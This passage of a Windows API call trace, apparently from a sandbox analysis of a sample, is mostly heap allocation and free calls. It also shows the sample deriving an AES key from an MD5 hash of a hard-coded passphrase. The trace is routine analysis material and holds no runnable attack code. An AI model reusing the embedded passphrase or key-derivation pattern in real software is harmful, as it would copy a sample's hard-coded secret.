hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0129.980] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0130.061] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.061] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0130.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0130.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0130.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0130.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.062] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0130.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.062] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0130.062] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.062] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0130.062] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0130.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0130.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0130.107] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0130.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0130.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0130.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cadc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0130.108] CryptHashData (hHash=0x41ac700, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0130.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.108] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0130.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb078, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0130.108] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0130.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0130.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0130.109] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf28 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf70 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0130.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafb8 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0130.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0130.111] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0130.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0130.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e28 [0130.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0130.112] CryptDestroyHash (hHash=0x41ac700) returned 1 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0130.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0130.113] RtlAllocateHeap 